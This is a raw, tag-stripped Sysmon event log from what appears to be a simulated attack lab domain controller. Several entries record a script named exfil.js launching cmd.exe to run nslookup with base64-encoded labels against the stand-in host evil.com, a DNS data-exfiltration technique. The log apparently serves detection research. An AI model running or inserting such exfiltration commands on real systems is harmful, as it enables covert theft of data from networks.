AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52214- 354300x8000000000000000195510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.084{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52213- 23542300x800000000000000043914Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:11.901{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C3E9A9E76030F83898DA13395803D5,SHA256=B2A104C5B60EB1FB63B898A8C2408FAC3E34787A8CC7A3602DF5F49AEA4505AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000195509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.084{00000000-0000-0000-0000-000000000000}7288<unknown process>-udptruefalse127.0.0.1-52213-false127.0.0.1-53domain 354300x8000000000000000195508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52212- 354300x8000000000000000195507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52211- 354300x8000000000000000195506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.997{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52210- 354300x8000000000000000195505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.997{00000000-0000-0000-0000-000000000000}8016<unknown process>-udptruefalse127.0.0.1-52210-false127.0.0.1-53domain 354300x8000000000000000195504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.904{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52209- 354300x8000000000000000195503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.903{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52208- 354300x8000000000000000195502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.902{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52207- 354300x8000000000000000195501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.902{00000000-0000-0000-0000-000000000000}7316<unknown process>-udptruefalse127.0.0.1-52207-false127.0.0.1-53domain 10341000x8000000000000000195500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-4E3E-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-17A1-629A-783D-000000005F02}55526140C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-4E3E-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.233{2E1864BB-17AB-629A-4E3E-000000005F02}8100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnbbb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.226{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlughvf.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-17AB-629A-4C3E-000000005F02}62004152C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-4D3E-000000005F02}732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-4D3E-000000005F02}732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.173{2E1864BB-17AB-629A-4B3E-000000005F02}78488008C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-4D3E-000000005F02}732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.176{2E1864BB-17AB-629A-4D3E-000000005F02}732C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-4B3E-000000005F02}7848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlughvf.tmp 2>&1 23542300x8000000000000000195484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.157{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD08ABCDB329DE83D37E0EEBD4543D73,SHA256=BFEF1E596E6C1DCCAA2084332402915284B4F3BD5FA5D47AC14590A0F4C3998A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.142{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-4C3E-000000005F02}6200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.142{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-4C3E-000000005F02}6200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000195481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.142{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7CCACB044BDB5BE796012832C550203,SHA256=CDEB9BF94D463D802A3A0A902E43EEB9518E4E2A2B61FB0546A6242EEDC152E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.142{2E1864BB-17AB-629A-4C3E-000000005F02}62004152C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-4B3E-000000005F02}7848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.126{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-4C3E-000000005F02}6200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.126{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.126{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.126{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.126{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-4B3E-000000005F02}7848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.126{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 